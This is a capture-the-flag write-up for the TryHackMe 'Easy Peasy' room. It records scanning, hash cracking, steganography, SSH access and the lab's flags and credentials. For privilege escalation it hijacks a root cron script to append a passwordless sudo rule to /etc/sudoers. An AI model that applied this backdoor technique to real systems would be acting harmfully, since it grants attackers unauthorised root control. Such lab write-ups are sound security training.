# Easy Peasy TryHackMe Room
* https://tryhackme.com/room/easypeasyctf

## Loot
* Flags
    1. `flag{f1rs7_fl4g}`
    2.  `flag{1m_s3c0nd_fl4g}` -> Found by searching on google for `a18672860d0510e5ab6699730763b250`
    3. `flag{9fdafbd64c47471a8f54cd3fc64cd312}` (actually present in the wordlist provided)
    4. `flag{n0wits33msn0rm4l}`
    5. `flag{63a9f0ea7bb98050796b649e85481845}`
* Others
    * username : `boring`
    * password : `iconvertedmypasswordtobinary`
    * `emerald`
    * `User-Agent:a18672860d0510e5ab6699730763b250`
    * `ObsJmP173N2X6dOrAgEAL0Vu`
    * `940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81` => SHA-256 => `mypasswordforthatjob`
    * `/var/www/.mysecretcronjob.sh`

## Interesting
* 80/tcp : nginx 1.16.1
    * /hidden => page with nothing
    * /hidden/whatever => hidden `<p>` with : `ZmxhZ3tmMXJzN19mbDRnfQ==` => Flag 1 encoded in base64
* 6498/tcp : OpenSSH 7.6p1 Ubuntu
* 65524/tcp : Apache httpd 2.4.43 (Ubuntu)
    * /robots.txt => user-agent
    * /n0th1ng3ls3m4tt3r

## Discovery and Port Scanning
* `nmap -sV -sC -p- 10.10.6.76`

## Web Discovery Port 80
* `gobuster dir -u http://10.10.6.76 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt`
* `gobuster dir -u http://10.10.6.76/hidden -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt`
* `gobuster dir -u http://10.10.6.76/hidden/whatever -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt`
* `gobuster dir -u http://10.10.6.76 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -a a18672860d0510e5ab6699730763b250`
* ``gobuster dir -u http://10.10.6.76/hidden -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -a a18672860d0510e5ab6699730763b250`

## Web Discovery Port 65524
* `gobuster dir -u http://10.10.6.76:65524 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt`
* Manual discovery : 
```
User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:a18672860d0510e5ab6699730763b250
Allow:/
This Flag Can Enter But Only This Flag No More Exception
```
* It appears we need this user-agent to access content
* It might also be a MD5 hash
* `gobuster dir -u http://10.10.6.76:65524 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -a a18672860d0510e5ab6699730763b250`
* Something found hidden in the index page : 
```
<p hidden>its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu</p>
```
* This is actually encoded with Base62!!!!!!!!!!! => `/n0th1ng3ls3m4tt3r`
* Manually found this in index page : 
```
Fl4g 3 : flag{9fdafbd64c47471a8f54cd3fc64cd312}
```
* `gobuster dir -u http://10.10.6.76:65524 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -a a18672860d0510e5ab6699730763b250`
* `gobuster dir -u http://10.10.6.76:65524 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -a a18672860d0510e5ab6699730763b250 -x .txt,.php,.html,.bak`


## MD5 Hash Cracking `a18672860d0510e5ab6699730763b250`
* `john md5hash --wordlist ../rockyou.txt --format=raw-md5` => Found `emerald`

## SSH USER ACCESS
* `ssh user@10.10.6.76 -p 6498` -> bad username probably

## Stegano on the website images
* I saved all the images found on the websites (3 of them)
* Tried `steghide extract -sf index.jpeg` with different possible passwords
* `mypasswordforthatjob` works!
* Got a `secrettext.txt` file with a username and password (decoded with cyberchef)

## SSH USER ACCESS AGAIN
* `ssh boring@10.10.6.76 -p 6498` with `iconvertedmypasswordtobinary` => works!
* User flag is right there : `synt{a0jvgf33zfa0ez4y}`, decoded with ROT13

## Privilege Escalation
* `sudo -l` -> nothing
* Didn't find any interesting files in /home directory
* `find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null` -> nothing
* `find / -perm -6000 -exec ls -ldb {} \; 2>/dev/null` -> nothing
* `/etc/crontab` has an interesting cronjob in `/var/www/.mysecretcronjob.sh`
* It is a bash script that runs as root and I have write permissions ... 
* I put his in it : `echo "boring ALL=(ALL) NOPASSWD:ALL" ­­>> /etc/sudoers`
* The script runs every minute, so wait one minute or so
* WORKS!! 
* `sudo su`
* root flag in /root/.root.txt


